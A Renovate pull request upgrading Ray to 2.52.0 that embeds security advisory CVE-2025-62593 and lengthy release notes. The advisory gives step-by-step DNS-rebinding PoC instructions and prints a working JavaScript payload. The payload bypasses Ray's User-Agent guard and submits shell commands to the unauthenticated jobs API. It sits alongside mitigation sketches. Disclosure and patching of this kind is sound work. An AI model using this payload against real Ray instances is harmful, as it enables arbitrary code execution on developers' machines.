chore(deps): update dependency ray to v2.52.0 [security] #5991
Merging this PR will not alter performance
Codecov Report: ✅ All modified and coverable lines are covered by tests.
Signed-off-by: Adam Gutglick <adam@spiraldb.com>
Edited/Blocked Notification: Renovate will not automatically rebase this PR because it does not recognize the last commit author and assumes somebody else may have edited the PR. You can manually request a rebase by checking the rebase/retry box above.
danking left a comment:
There's probably an argument for testing old versions of Ray, but the lock file in the repo should be free to change as we see fit.
> **Note:** This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ray](https://redirect.github.com/ray-project/ray) | `2.50.0` → `2.52.0` | | |
### GitHub Vulnerability Alerts
#### [CVE-2025-62593](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v)
# Summary
Developers using Ray as a development tool can be compromised through
a critical remote code execution (RCE) vulnerability that is reachable
via Firefox and Safari.
The longstanding
[decision](https://docs.ray.io/en/releases-2.51.1/ray-security/index.html)
by the Ray development team not to implement any form of authentication
on critical endpoints, such as `/api/jobs` and `/api/job_agent/jobs/`,
has once again led to a severe vulnerability that allows attackers to
execute arbitrary code against Ray, this time in a development context
via the Firefox and Safari browsers.
This vulnerability stems from an insufficient guard against
browser-based attacks: the current defense treats any request whose
`User-Agent` header starts with the string "Mozilla" as coming from a
browser. This defense is insufficient because the fetch specification
allows the `User-Agent` header to be modified.
Combined with a DNS rebinding attack against the browser, this
vulnerability can be exploited against a developer running Ray who
inadvertently visits a malicious website or is served a malicious
advertisement
([malvertising](https://en.wikipedia.org/wiki/Malvertising)).
# Details
The mitigations implemented to protect local Ray nodes against
browser-based attacks are insufficient.
## Current Mitigation Strategies
```python
def is_browser_request(req: Request) -> bool:
    """Checks if a request is made by a browser like user agent.

    This heuristic is very weak, but hard for a browser to bypass- eg,
    fetch/xhr and friends cannot alter the user-agent, but requests made with
    an http library can stumble into this if they choose to user a browser like
    user agent.
    """
    return req.headers["User-Agent"].startswith("Mozilla")


def deny_browser_requests() -> Callable:
    """Reject any requests that appear to be made by a browser"""

    def decorator_factory(f: Callable) -> Callable:
        @functools.wraps(f)
        async def decorator(self, req: Request):
            if is_browser_request(req):
                return Response(
                    text="Browser requests not allowed",
                    status=aiohttp.web.HTTPMethodNotAllowed.status_code,
                )
            return await f(self, req)

        return decorator

    return decorator_factory
```
https://github.com/ray-project/ray/blob/f39a860436dca3ed5b9dfae84bd867ac10c84dc6/python/ray/dashboard/optional_utils.py#L129-L155
```python
@aiohttp.web.middleware
async def browsers_no_post_put_middleware(self, request, handler):
    if (
        # A best effort test for browser traffic. All common browsers
        # start with Mozilla at the time of writing.
        dashboard_optional_utils.is_browser_request(request)
        and request.method in [hdrs.METH_POST, hdrs.METH_PUT]
    ):
        return aiohttp.web.Response(
            status=405, text="Method Not Allowed for browser traffic."
        )
    return await handler(request)
```
https://github.com/ray-project/ray/blob/e7889ae542bf0188610bc8b06d274cbf53790cbd/python/ray/dashboard/http_server_head.py#L184-L196
This is because the fundamental assumption, that the `User-Agent`
header can't be manipulated, is incorrect. In Firefox and Safari, the
`fetch` API allows the `User-Agent` header to be set to a different
value. Ironically, Chrome is not vulnerable only because of a
[bug](https://issues.chromium.org/issues/40450316) that puts it out of
line with the `fetch` specification.
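To make the failure mode concrete, the minimal sketch below reimplements the two checks above against plain header dictionaries instead of aiohttp `Request` objects (a simplification for illustration only; `blocked_by_middleware` is a hypothetical name, and the Firefox `User-Agent` string is just an example value). The `"Other"` value is the one the Singularity payload sets in its `fetch` call.

```python
from typing import Mapping


def is_browser_request(headers: Mapping[str, str]) -> bool:
    # Same test as Ray's helper: any User-Agent starting with "Mozilla" counts as a browser.
    return headers["User-Agent"].startswith("Mozilla")


def blocked_by_middleware(method: str, headers: Mapping[str, str]) -> bool:
    # Mirrors browsers_no_post_put_middleware: reject browser POST/PUT requests only.
    return is_browser_request(headers) and method in ("POST", "PUT")


# Example header a browser sends when page script leaves User-Agent alone.
default_firefox = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
}
# Header after page script overrides it, as the Singularity payload does.
spoofed = {"User-Agent": "Other"}

print(blocked_by_middleware("POST", default_firefox))  # True: rejected with 405
print(blocked_by_middleware("POST", spoofed))          # False: reaches /api/jobs/
```

Because the whole decision hinges on one header value that the page itself controls in Firefox and Safari, no tuning of the prefix string can make this check reliable.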
Exploiting this vulnerability requires a DNS rebinding attack against
the browser, something modern tooling like
[nccgroup/singularity](https://redirect.github.com/nccgroup/singularity)
makes trivial.
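DNS rebinding works because the browser's same-origin policy is keyed on the host name, not on the IP address it resolves to: after rebinding, the attacker's page and the local Ray dashboard share an origin. One widely used server-side mitigation, shown here as a hedged sketch and not as what Ray's fix commit does, is to check the `Host` header against an allowlist. Unlike `User-Agent`, `Host` is a forbidden request header in the Fetch specification, so page script cannot override it, and a rebound request still carries the attacker's host name. `ALLOWED_HOSTS`, `host_name`, and `host_is_allowed` are hypothetical names.

```python
from typing import Mapping

# Hypothetical allowlist of names a local-only dashboard expects to be reached by.
ALLOWED_HOSTS = frozenset({"localhost", "127.0.0.1", "[::1]"})


def host_name(host_header: str) -> str:
    """Strip an optional ':port' suffix without breaking bracketed IPv6 literals."""
    if host_header.startswith("["):
        return host_header.split("]", 1)[0] + "]"
    return host_header.rsplit(":", 1)[0] if ":" in host_header else host_header


def host_is_allowed(headers: Mapping[str, str], allowed: frozenset = ALLOWED_HOSTS) -> bool:
    # Note: a plain dict is case-sensitive, while aiohttp's request.headers is not.
    return host_name(headers.get("Host", "")).lower() in allowed


# A direct local request versus a rebound request from the attacker's page.
print(host_is_allowed({"Host": "localhost:8265"}))               # True
print(host_is_allowed({"Host": "rebind.attacker.example:8265"}))  # False
```

A deployment that is legitimately reached under other names (a LAN IP, a reverse-proxy host name) would need those names added to the allowlist.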
# PoC
Please note: this full PoC will go live at the time of disclosure.
1. Launch Ray: `ray start --head --port=6379`
2. Ensure that the Ray dashboard/service is running on port `8265`.
3. Launch an internet-facing instance of NCCGroup/Singularity following
the [setup guide
here](https://redirect.github.com/nccgroup/singularity/wiki/Setup-and-Installation).
4. Visit the following URL in Firefox or Safari:
`http://[my.singularity.instance]:8265/manager.html`
5. Under "Attack Payload", select `Ray Jobs RCE (default port 8265)`.
6. Click "Start Attack". If you see a 404 error in the iFrame window
that pops up, refresh the page and retry starting at step 3.
7. Once the DNS rebinding attack succeeds (you may need to try a few
times), an alert will appear, the jobs API will be invoked, and the
embedded shell code will be executed, popping up the calculator.
If this attack doesn't work, consider clicking "Toggle Advanced
Options" and trying an alternative "Rebinding Strategy". I've personally
been able to get this attack to work multiple times on macOS on several
different residential networks around the Seattle area. Some corporate
networks _may_ block DNS rebinding attacks, but likely not many.
## What's going on?
This is the payload running in
[nccgroup/singularity](https://redirect.github.com/nccgroup/singularity):
```javascript
/**
 * This payload exploits Ray (https://github.com/ray-project/ray)
 * It opens the "Calculator" application on various operating systems.
 * The payload can be easily modified to target different OSes or implementations.
 * The TCP port attacked is 8265.
 */
const RayRce = () => {
    // Invoked after DNS rebinding has been performed
    function attack(headers, cookie, body) {
        // Get the current timestamp in milliseconds
        const timestamp = Date.now();
        // OS-agnostic calculator command that tries multiple approaches
        const calculatorCommand = `
# Try Windows calculator first
if command -v calc.exe >/dev/null 2>&1; then
    echo Windows calculator launching
    calc.exe &
# Try macOS calculator
elif command -v open >/dev/null 2>&1; then
    echo macOS calculator launching
    open -a Calculator &
elif [ -f "/System/Applications/Calculator.app/Contents/MacOS/Calculator" ]; then
    echo macOS calculator launching
    /System/Applications/Calculator.app/Contents/MacOS/Calculator &
# Try Linux calculators
elif command -v gnome-calculator >/dev/null 2>&1; then
    echo Linux calculator launching
    gnome-calculator &
elif command -v kcalc >/dev/null 2>&1; then
    echo Linux calculator launching
    kcalc &
elif command -v xcalc >/dev/null 2>&1; then
    echo Linux calculator launching
    xcalc &
# Fallback: try to find any calculator binary
else
    echo Linux calculator launching
    find /usr/bin /usr/local/bin /opt -name "*calc*" -type f -executable 2>/dev/null | head -1 | xargs -I {} {} &
fi
echo RAY RCE: By JLLeitschuh ${timestamp}
`;
        const data = {
            "entrypoint": calculatorCommand,
            "runtime_env": {},
            "job_id": null,
            "metadata": {
                "job_submission_id": timestamp.toString(),
                "source": "nccgroup/singluarity"
            }
        };
        sooFetch('/api/jobs/', {
            method: 'POST',
            headers: {
                'User-Agent': 'Other',
            },
            body: JSON.stringify(data),
        })
            .then(response => {
                console.log(response);
                return response.json()
            }) // parses JSON response into native JavaScript objects
            .then(data => {
                console.log('Success:', data);
            })
            .catch((error) => {
                console.error('Error:', error);
            });
    }
    // Invoked to determine whether the rebinded service
    // is the one targeted by this payload. Must return true or false.
    async function isService(headers, cookie, body) {
        return sooFetch("/", {
            mode: 'no-cors',
            credentials: 'omit',
        })
            .then(function (response) {
                return response.text()
            })
            .then(function (d) {
                if (d.includes("You need to enable JavaScript")) {
                    return true;
                } else {
                    return false;
                }
            })
            .catch(e => { return (false); })
    }
    return {
        attack,
        isService
    }
}
Registry["Ray Jobs RCE"] = RayRce();
```
See:
[https://github.com/nccgroup/singularity/pull/68](https://redirect.github.com/nccgroup/singularity/pull/68)
# Impact
This vulnerability impacts developers running development/testing
environments with Ray. If they fall victim to a phishing attack, or are
served a malicious ad, they can be exploited and arbitrary shell code
can be executed on their developer machine.
This attack can also be leveraged to attack network-adjacent instance of
ray by leveraging the browser as a confused deputy intermediary to
attack ray instances running inside a private corporate network.
# Fix
The fix for this vulnerability is to update to Ray 2.52.0 or higher.
This version also, finally, adds a disabled-by-default authentication
feature that can further harden against this vulnerability:
https://docs.ray.io/en/latest/ray-security/token-auth.html
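Token authentication closes the hole independently of any browser heuristic: a rebound page can still send requests, but it does not know the secret, and browsers do not attach a bearer token automatically. The minimal sketch below shows the general idea of a bearer-token check; it is not Ray's implementation, and the `Authorization: Bearer` scheme and the function names are assumptions for illustration (see the linked documentation for how Ray actually configures and transmits its token).

```python
import hmac
import secrets
from typing import Mapping


def make_token() -> str:
    # 32 random bytes, URL-safe base64 encoded.
    return secrets.token_urlsafe(32)


def is_authorized(headers: Mapping[str, str], expected_token: str) -> bool:
    """Accept only requests carrying 'Authorization: Bearer <expected_token>'."""
    scheme, _, presented = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not presented:
        return False
    # Constant-time comparison avoids leaking the token through response timing.
    return hmac.compare_digest(presented.encode(), expected_token.encode())


token = make_token()
print(is_authorized({"Authorization": f"Bearer {token}"}, token))  # True
print(is_authorized({"User-Agent": "Other"}, token))               # False
```

Note that the spoofed `User-Agent` from the PoC is irrelevant here: the decision depends only on a value the attacker's page cannot learn.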
Fix commit:
https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09
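A quick way to confirm whether an environment still has a vulnerable Ray is to compare the installed version with 2.52.0. This sketch uses only the standard library and deliberately ignores pre-release suffixes (so `2.52.0rc1` is treated as 2.52.0); `packaging.version.Version` is the more robust choice if that package is available. The names `release_tuple` and `is_fixed` are illustrative.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_RELEASE = (2, 52, 0)  # first release carrying the fix, per the advisory above


def release_tuple(v: str) -> tuple:
    """Parse the leading 'X[.Y[.Z]]' of a version string into a 3-tuple of ints."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", v)
    if m is None:
        raise ValueError(f"unrecognized version string: {v!r}")
    return tuple(int(g or 0) for g in m.groups())


def is_fixed(v: str) -> bool:
    return release_tuple(v) >= FIXED_RELEASE


if __name__ == "__main__":
    try:
        installed = version("ray")
    except PackageNotFoundError:
        print("ray is not installed in this environment")
    else:
        status = "includes the fix" if is_fixed(installed) else "upgrade to >= 2.52.0"
        print(f"ray {installed}: {status}")
```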
After knowing about the attack for 19 years, several browsers have
recently begun hardening against DNS rebinding ([Chrome Local Network
Access](https://developer.chrome.com/blog/local-network-access)). These
changes _may_ protect you, but a previous initiative, "Private Network
Access", was rolled back, so updating is highly recommended as a
defense-in-depth strategy.
# Credit
The fetch bypass was originally theorized by @avilum at
[Oligo](https://www.oligo.security/). The DNS rebinding step, full PoC,
and disclosure were by @JLLeitschuh while at
[Socket](https://socket.dev/).
---
### Release Notes
<details>
<summary>ray-project/ray (ray)</summary>
### [`v2.52.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.52.0)

[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.2...ray-2.52.0)
##### Release Highlights
**Ray Core:**
- End of Life for Python 3.9 Support: Ray will no longer be releasing
Python 3.9 wheels from now on.
- Token authentication: Ray now supports built-in token authentication
across all components including the dashboard, CLI, API clients, and
internal services. This provides an additional layer of security for
production deployments to reduce the risk of unauthorized code
execution. Token authentication is initially off by default. For more
information, see:
<https://docs.ray.io/en/latest/ray-security/token-auth.html>
**Ray Data:**
- We’ve added a number of improvements for Iceberg, including upserts,
predicate and projection pushdown, and overwrite.
- We’ve added significant improvements to our expressions framework,
including temporal, list, tensor, and struct datatype expressions.
##### Ray Libraries
##### Ray Data
🎉 New Features:
- Added predicate pushdown rule that pushes filter predicates past
eligible operators
([#58150](https://redirect.github.com/ray-project/ray/pull/58150), [#58555](https://redirect.github.com/ray-project/ray/pull/58555))
- Iceberg support for upsert tables, schema updates, and overwrite
operations
([#​58270](https://redirect.github.com/ray-project/ray/pull/58270))
- Iceberg support for predicate and projection pushdown
([#​58286](https://redirect.github.com/ray-project/ray/pull/58286))
- Iceberg write datafiles in write() then commit
([#​58601](https://redirect.github.com/ray-project/ray/pull/58601))
- Enhanced Unity Catalog integration
([#​57954](https://redirect.github.com/ray-project/ray/pull/57954))
- Namespaced expressions that expose PyArrow functions
([#​58465](https://redirect.github.com/ray-project/ray/pull/58465))
- Added version argument to read\_delta\_lake
([#​54976](https://redirect.github.com/ray-project/ray/pull/54976))
- Generator UDF support for map\_groups
([#​58039](https://redirect.github.com/ray-project/ray/pull/58039))
- ApproximateTopK aggregator
([#​57950](https://redirect.github.com/ray-project/ray/pull/57950))
- Serialization framework for preprocessors
([#​58321](https://redirect.github.com/ray-project/ray/pull/58321))
- Support for temporal, list, tensor, and struct datatypes
([#​58225](https://redirect.github.com/ray-project/ray/pull/58225))
💫 Enhancements:
- Use approximate quantile for RobustScaler preprocessor
([#​58371](https://redirect.github.com/ray-project/ray/pull/58371))
- Map batches support for limit pushdown
([#​57880](https://redirect.github.com/ray-project/ray/pull/57880))
- Make all map operations zero-copy by default
([#​58285](https://redirect.github.com/ray-project/ray/pull/58285))
- Use tqdm\_ray for progress reporting from workers
([#​58277](https://redirect.github.com/ray-project/ray/pull/58277))
- Improved concurrency cap backpressure tuning
([#58163](https://redirect.github.com/ray-project/ray/pull/58163), [#58023](https://redirect.github.com/ray-project/ray/pull/58023), [#57996](https://redirect.github.com/ray-project/ray/pull/57996))
- Sample finalized partitions randomly to avoid lens effect
([#​58456](https://redirect.github.com/ray-project/ray/pull/58456))
- Allow file extensions starting with '.'
([#​58339](https://redirect.github.com/ray-project/ray/pull/58339))
- Set default file\_extensions for read\_parquet
([#​56481](https://redirect.github.com/ray-project/ray/pull/56481))
- URL decode values in parse\_hive\_path
([#​57625](https://redirect.github.com/ray-project/ray/pull/57625))
- Streaming partition enforces row\_num per block
([#​57984](https://redirect.github.com/ray-project/ray/pull/57984))
- Streaming repartition combines small blocks
([#​58020](https://redirect.github.com/ray-project/ray/pull/58020))
- Lower
DEFAULT\_ACTOR\_MAX\_TASKS\_IN\_FLIGHT\_TO\_MAX\_CONCURRENCY\_FACTOR to
2
([#​58262](https://redirect.github.com/ray-project/ray/pull/58262))
- Set udf-modifying-row-count default to false
([#​58264](https://redirect.github.com/ray-project/ray/pull/58264))
- Cache PyArrow schema operations
([#​58583](https://redirect.github.com/ray-project/ray/pull/58583))
- Explain optimized plans
([#​58074](https://redirect.github.com/ray-project/ray/pull/58074))
- Ranker interface
([#​58513](https://redirect.github.com/ray-project/ray/pull/58513))
🔨 Fixes:
- Fixed renamed columns to be appropriately dropped from output
([#58040](https://redirect.github.com/ray-project/ray/pull/58040), [#58071](https://redirect.github.com/ray-project/ray/pull/58071))
- Fixed handling of renames in projection pushdown
([#58033](https://redirect.github.com/ray-project/ray/pull/58033), [#58037](https://redirect.github.com/ray-project/ray/pull/58037))
- Fixed broken LogicalOperator abstraction barrier in predicate pushdown
rule
([#​58683](https://redirect.github.com/ray-project/ray/pull/58683))
- Fixed file size ordering in download partitioning with multiple URI
columns
([#​58517](https://redirect.github.com/ray-project/ray/pull/58517))
- Fixed HTTP streaming file download by using open\_input\_stream
([#​58542](https://redirect.github.com/ray-project/ray/pull/58542))
- Fixed expression mapping for Pandas
([#​57868](https://redirect.github.com/ray-project/ray/pull/57868))
- Fixed reading from zipped JSON
([#​58214](https://redirect.github.com/ray-project/ray/pull/58214))
- Fixed MCAP datasource import for better compatibility
([#​57964](https://redirect.github.com/ray-project/ray/pull/57964))
- Avoid slicing block when total\_pending\_rows < target
([#​58699](https://redirect.github.com/ray-project/ray/pull/58699))
- Clear queue for manually marked execution\_finished operators
([#​58441](https://redirect.github.com/ray-project/ray/pull/58441))
- Add exception handling for invalid URIs in download operation
([#​58464](https://redirect.github.com/ray-project/ray/pull/58464))
- Fixed progress bar name display
([#​58451](https://redirect.github.com/ray-project/ray/pull/58451))
📖 Documentation:
- Documentation for Ray Data metrics
([#​58610](https://redirect.github.com/ray-project/ray/pull/58610))
- Simplify and add Ray Data LLM quickstart example
([#​58330](https://redirect.github.com/ray-project/ray/pull/58330))
- Convert rST-style to Google-style docstrings
([#​58523](https://redirect.github.com/ray-project/ray/pull/58523))
🏗 Architecture:
- Removed stats update thread
([#​57971](https://redirect.github.com/ray-project/ray/pull/57971))
- Refactor histogram metrics
([#​57851](https://redirect.github.com/ray-project/ray/pull/57851))
- Revisit OpResourceAllocator to make data flow explicit
([#​57788](https://redirect.github.com/ray-project/ray/pull/57788))
- Create unit test directory for fast, isolated tests
([#​58445](https://redirect.github.com/ray-project/ray/pull/58445))
- Dump verbose ResourceManager telemetry into ray-data.log
([#​58261](https://redirect.github.com/ray-project/ray/pull/58261))
##### Ray Train
🎉 New Features:
- Result::from\_path implementation in v2
([#​58216](https://redirect.github.com/ray-project/ray/pull/58216))
💫 Enhancements:
- Exit actor and log appropriately when poll\_workers is in terminal
state
([#​58287](https://redirect.github.com/ray-project/ray/pull/58287))
- Set JAX\_PLATFORMS environment variable based on ScalingConfig
([#​57783](https://redirect.github.com/ray-project/ray/pull/57783))
- Default to disabling Ray Train collective util timeouts
([#​58229](https://redirect.github.com/ray-project/ray/pull/58229))
- Add SHUTTING\_DOWN TrainControllerState and improve logging
([#​57882](https://redirect.github.com/ray-project/ray/pull/57882))
- Improved error message when calling training function utils outside
Ray Train worker
([#​57863](https://redirect.github.com/ray-project/ray/pull/57863))
- FSDP2 template: Resume from previous epoch when checkpointing
([#​57938](https://redirect.github.com/ray-project/ray/pull/57938))
- Clean up checkpoint config and trainer param deprecations
([#​58022](https://redirect.github.com/ray-project/ray/pull/58022))
- Update failure policy log message
([#​58274](https://redirect.github.com/ray-project/ray/pull/58274))
📖 Documentation:
- Ray Train Metrics documentation page
([#​58235](https://redirect.github.com/ray-project/ray/pull/58235))
- Local mode user guide
([#​57751](https://redirect.github.com/ray-project/ray/pull/57751))
- Recommend tree\_learner="data\_parallel" in examples for distributed
LightGBM training
([#​58709](https://redirect.github.com/ray-project/ray/pull/58709))
##### Ray Serve
##### 🎉 New Features:
- **Custom request routing with runtime environment support.** Users can
now define custom request router classes that are safely imported and
serialized using the application's runtime environment, enabling
advanced routing logic with custom dependencies.
([#​56855](https://redirect.github.com/ray-project/ray/issues/56855))
- **Custom autoscaling policies with enhanced logging.**
Deployment-level and application-level autoscaling policies now display
their custom policy names in logs, making it easier to debug and monitor
autoscaling behavior.
([#​57878](https://redirect.github.com/ray-project/ray/issues/57878))
- **Audio transcription support in vLLM backend.** Ray Serve now
supports transcription tasks through the vLLM engine, expanding
multimodal capabilities.
([#​57194](https://redirect.github.com/ray-project/ray/issues/57194))
- **Data parallel attention public API.** Introduced a public API for
data parallel attention, enabling efficient distributed attention
mechanisms for large-scale inference workloads.
([#​58301](https://redirect.github.com/ray-project/ray/issues/58301))
- **Route pattern tracking in proxy metrics.** Proxy metrics now expose
actual route patterns (e.g., `/api/users/{user_id}`) instead of just
route prefixes, enabling granular endpoint monitoring without high
cardinality issues. Performance impact is minimal (\~1% RPS decrease).
([#​58180](https://redirect.github.com/ray-project/ray/issues/58180))
- **Replica dependency graph construction.** Added
`list_outbound_deployments()` method to discover downstream deployment
dependencies, enabling programmatic analysis of service topology for
both stored and dynamically-obtained handles.
([#​58345](https://redirect.github.com/ray-project/ray/issues/58345),
[#​58350](https://redirect.github.com/ray-project/ray/issues/58350))
- **Multi-dimensional replica ranking.** Introduced `ReplicaRank` schema
with global, node-level, and local ranks to support advanced
coordination scenarios like tensor parallelism and model sharding across
nodes.
([#​58471](https://redirect.github.com/ray-project/ray/issues/58471),
[#​58473](https://redirect.github.com/ray-project/ray/issues/58473))
- **Proxy readiness verification.** Added a check to ensure proxies are
ready to serve traffic before `serve.run()` completes, improving
deployment reliability.
([#​57723](https://redirect.github.com/ray-project/ray/issues/57723))
- **IPv6 socket support.** Ray Serve now supports IPv6 networking for
socket communication.
([#​56147](https://redirect.github.com/ray-project/ray/issues/56147))
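The route-pattern item above is about metric label cardinality: labeling requests by the raw path creates one time series per user ID, while labeling by the matched pattern keeps the label set bounded. The toy matcher below illustrates only that idea; it is not Ray Serve's routing or metrics code, and the `ROUTES` table and `route_label` function are hypothetical.

```python
from collections import Counter
from typing import Iterable

# Hypothetical route table for illustration.
ROUTES = ["/api/users/{user_id}", "/api/orders/{order_id}/items"]


def route_label(path: str, patterns: Iterable[str] = ROUTES) -> str:
    """Return the first pattern whose segments match `path`; {name} matches any one segment."""
    segments = path.strip("/").split("/")
    for pattern in patterns:
        parts = pattern.strip("/").split("/")
        if len(parts) == len(segments) and all(
            (p.startswith("{") and p.endswith("}")) or p == s
            for p, s in zip(parts, segments)
        ):
            return pattern
    return "unmatched"


paths = [f"/api/users/{i}" for i in range(1000)] + ["/api/orders/7/items"]
raw_labels = Counter(paths)                             # one label per distinct path
pattern_labels = Counter(route_label(p) for p in paths)  # one label per route
print(len(raw_labels), len(pattern_labels))  # 1001 2
```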
##### 💫 Enhancements:
- **Selective throughput optimization flag overrides.** Users can now
override individual flags set by `RAY_SERVE_THROUGHPUT_OPTIMIZED`
without manually configuring all flags, improving flexibility for
performance tuning.
([#​58057](https://redirect.github.com/ray-project/ray/issues/58057))
- **OpenTelemetry metrics enabled by default.** Ray now uses
OpenTelemetry as the default metrics backend, with updated metric names
(`ray_serve_*`) and improved observability infrastructure.
([#​56432](https://redirect.github.com/ray-project/ray/issues/56432))
- **Cleaner long-poll communication.** Removed actor handles from
`RunningReplicaInfo` objects passed in long-poll updates, avoiding
complex reference counting patterns.
([#​58174](https://redirect.github.com/ray-project/ray/issues/58174))
- **Improved replica config handling.** Excluded
`IMPLICIT_RESOURCE_PREFIX` from `ReplicaConfig.ray_actor_options` to
prevent internal resource annotations from leaking into user-visible
configurations.
([#​58275](https://redirect.github.com/ray-project/ray/issues/58275))
- **Custom autoscaling telemetry.** Added telemetry tracking for custom
autoscaling policy usage.
([#​58336](https://redirect.github.com/ray-project/ray/issues/58336))
- **Proxy target group control.** Added `from_proxy_manager` argument to
`get_target_groups()` for finer control over returned routing targets.
([#​57620](https://redirect.github.com/ray-project/ray/issues/57620))
##### 🔨 Fixes:
- **Fixed default deployment name in async inference.** Corrected the
default deployment name which was changed to `_TaskConsumerWrapper`
during async inference implementation.
([#​57664](https://redirect.github.com/ray-project/ray/issues/57664))
- **Fixed proxy location handling in CLI and Python API.** `serve run`
now respects `proxy_location` from config files instead of hardcoding
`EveryNode`, and `serve.start()` no longer defaults to `HeadOnly` when
`http_options` are provided without an explicit location.
([#​57622](https://redirect.github.com/ray-project/ray/issues/57622))
- **Fixed deprecated Stable Diffusion model in example.** Updated
documentation example to use a current model after
`stabilityai/stable-diffusion-2` was deprecated on Hugging Face.
([#​58609](https://redirect.github.com/ray-project/ray/issues/58609))
##### 📖 Documentation:
- **KV-cache offloading user guide.** Added comprehensive documentation
for KV-cache offloading in LLM deployments.
([#​58025](https://redirect.github.com/ray-project/ray/issues/58025))
- **Model loading documentation.** Documented best practices and options
for loading models in Ray Serve.
([#​57922](https://redirect.github.com/ray-project/ray/issues/57922))
- **Cross-node tensor/pipeline parallelism examples.** Added examples
and documentation for running TP/PP across multiple nodes.
([#​57715](https://redirect.github.com/ray-project/ray/issues/57715))
- **Data parallel attention documentation.** Created user guide for data
parallel attention with architecture diagrams.
([#​58301](https://redirect.github.com/ray-project/ray/issues/58301),
[#​58543](https://redirect.github.com/ray-project/ray/issues/58543))
- **Custom autoscaling policy examples.** Added missing imports and
improved clarity in autoscaling policy examples.
([#​57896](https://redirect.github.com/ray-project/ray/issues/57896),
[#​58170](https://redirect.github.com/ray-project/ray/issues/58170))
- **Async inference documentation improvements.** Added notes about task
consumer replica configurations and fixed the end-to-end example.
([#​58493](https://redirect.github.com/ray-project/ray/issues/58493))
- **Callback documentation.** Added documentation for using callbacks in
Ray Serve.
([#​58713](https://redirect.github.com/ray-project/ray/issues/58713))
- **Monitoring and troubleshooting improvements.** Enhanced monitoring
section with links to Anyscale troubleshooting resources.
([#​58472](https://redirect.github.com/ray-project/ray/issues/58472))
- **Minor documentation fixes.** Fixed spelling errors and improved
docstring alignment.
([#​58172](https://redirect.github.com/ray-project/ray/issues/58172),
[#​58233](https://redirect.github.com/ray-project/ray/issues/58233))
##### 🏗 Architecture refactoring:
- **Replica rank management refactoring.** Extracted generic
`RankManager` class with type-safe `ReplicaRank` representation,
creating a cleaner foundation for future multi-level rank support.
([#​58471](https://redirect.github.com/ray-project/ray/issues/58471),
[#​58473](https://redirect.github.com/ray-project/ray/issues/58473))
##### Ray Tune
💫 Enhancements:
- Updated jobs test to use tune module
([#​57995](https://redirect.github.com/ray-project/ray/pull/57995))
- Add pydantic to Ray Tune requirements
([#​58354](https://redirect.github.com/ray-project/ray/pull/58354))
##### RLlib
🎉 New Features:
- Support for vectorize modes in SingleAgentEnvRunner.make\_env
([#​58410](https://redirect.github.com/ray-project/ray/pull/58410))
- Support for composed spaces in Offline RL
([#​58594](https://redirect.github.com/ray-project/ray/pull/58594))
- Enhanced support for complex observations in SingleAgentEpisode
([#​57017](https://redirect.github.com/ray-project/ray/pull/57017))
- Prometheus metrics support for selected components
([#​57932](https://redirect.github.com/ray-project/ray/pull/57932))
💫 Enhancements:
- Improve test\_single\_agent\_env\_runner to prevent flaky tests
([#​58397](https://redirect.github.com/ray-project/ray/pull/58397))
- LINT improvements with enabled ruff imports across multiple modules
([#56737](https://redirect.github.com/ray-project/ray/pull/56737), [#56734](https://redirect.github.com/ray-project/ray/pull/56734), [#56741](https://redirect.github.com/ray-project/ray/pull/56741), [#56742](https://redirect.github.com/ray-project/ray/pull/56742), [#56744](https://redirect.github.com/ray-project/ray/pull/56744), [#56746](https://redirect.github.com/ray-project/ray/pull/56746))
🔨 Fixes:
- Resolve bug that fails to propagate model\_config to
MultiAgentRLModule instances
([#​58243](https://redirect.github.com/ray-project/ray/pull/58243))
- Fixed access to self.\_minibatch\_size
([#​58595](https://redirect.github.com/ray-project/ray/pull/58595))
- Broken restore from remote - Add missing FileSystem argument
([#​58324](https://redirect.github.com/ray-project/ray/pull/58324))
- Fixed deterministic sampling and training documentation link
([#​58494](https://redirect.github.com/ray-project/ray/pull/58494))
- Corrected typo in pyspiel import error message
([#​54618](https://redirect.github.com/ray-project/ray/pull/54618))
📖 Documentation:
- Add reinforcement learning example illustrating GPU-to-GPU RDT and
GRPO
([#​57961](https://redirect.github.com/ray-project/ray/pull/57961))
##### Ray Core
🎉 New Features:
- Token-based authentication across all Ray components
([#58046](https://redirect.github.com/ray-project/ray/pull/58046),
[#58047](https://redirect.github.com/ray-project/ray/pull/58047),
[#58176](https://redirect.github.com/ray-project/ray/pull/58176),
[#58209](https://redirect.github.com/ray-project/ray/pull/58209),
[#58276](https://redirect.github.com/ray-project/ray/pull/58276),
[#58281](https://redirect.github.com/ray-project/ray/pull/58281),
[#58308](https://redirect.github.com/ray-project/ray/pull/58308),
[#58333](https://redirect.github.com/ray-project/ray/pull/58333),
[#58368](https://redirect.github.com/ray-project/ray/pull/58368),
[#58395](https://redirect.github.com/ray-project/ray/pull/58395),
[#58405](https://redirect.github.com/ray-project/ray/pull/58405),
[#58408](https://redirect.github.com/ray-project/ray/pull/58408),
[#58424](https://redirect.github.com/ray-project/ray/pull/58424),
[#58557](https://redirect.github.com/ray-project/ray/pull/58557),
[#57835](https://redirect.github.com/ray-project/ray/pull/57835),
[#58566](https://redirect.github.com/ray-project/ray/pull/58566),
[#58591](https://redirect.github.com/ray-project/ray/pull/58591))
- OpenTelemetry enabled by default for improved observability
([#​56432](https://redirect.github.com/ray-project/ray/pull/56432))
- Fallback strategy scheduling logic
([#​56369](https://redirect.github.com/ray-project/ray/pull/56369))
- TPU utility functions to support slice placement groups
([#​56723](https://redirect.github.com/ray-project/ray/pull/56723))
- Exponential backoff for retryable gRPCs
([#​56568](https://redirect.github.com/ray-project/ray/pull/56568))
- Option for in-flight RPC failure injection
([#​58512](https://redirect.github.com/ray-project/ray/pull/58512))
- Release test to simulate network transient errors via iptables
([#​58241](https://redirect.github.com/ray-project/ray/pull/58241))
- Nightly release test with cross-AZ fault injection
